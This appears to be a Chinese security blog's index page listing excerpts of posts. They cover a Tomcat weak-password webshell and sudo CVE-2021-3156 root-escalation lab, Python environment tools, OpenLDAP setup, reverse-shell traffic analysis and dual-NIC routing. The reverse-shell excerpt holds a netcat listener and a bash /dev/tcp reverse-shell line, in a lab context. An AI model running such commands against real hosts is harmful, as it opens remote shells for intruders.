Loading...
该实验利用ubuntu 18.04以普通用户tomcat身份运行tomct中间件,利用Manager App弱口令上传webshell,获得tomcat权限,再利用sudo提取漏洞(CVE-2021-3156),将tomcat权限提升为root权限。系统:Ubuntu 18.04.5 LTS软件:apache-tomcat-9.0.45webshell管理工具:Behinder_v3.0 B...
在python中,如果一台主机的项目过多,各项目之间的python库可能会产生冲突,比如它们要求的某第三方库版本不同,这时候就需要python环境管理系统,让各项目在不同的python环境下运行,互不干扰。这里介绍两种常用的python环境管理工具,virtualenv与conda。一、virtualenv0x01 virtualenv安装yum -y install python-virt...
LDAP(Light Directory Access Portocol)轻型目录访问协议,通过IP协议提供访问控制和维护分布式信息的目录信息。通常使用ldap来实现访问控制、权限管理、资源管理等,Microsoft Active Directory即使用ldap协议来做域控用户登录认证,而OpenLDAP则是利用ldap协议实现开源的统一认证服务。本文OpenLDAP的搭建基于简书博主小尛...
反弹shell(reverse shell)是控制端监听某端口,受控端发起连接到控制端。互联网上有大量关于反弹shell的资料,这里不再论述,本文只是分析一下linux系统下各种反弹shell的流量。控制端:kali受控端:centos7控制端开启nc监听命令:nc -lvp 33330x01 Bash反弹shell/bin/bash -i >& /dev/tcp/192.16...
有两台主机分别为a和b网段,互相ping不通,但是有一台双网卡主机的双网卡对应的IP正好位于a和b网段,双网卡主机可以分别ping通跨网段的这两台主机,此时就可以让这台中间双网卡主机作为数据包转发的“桥梁”,利用路由表,充当路由器的作用。实验主机:A主机(linux,IP:192.168.2.2)、双网卡主机(win10,IP:192.168.2.3、192.168.3.3)、B主机(lin...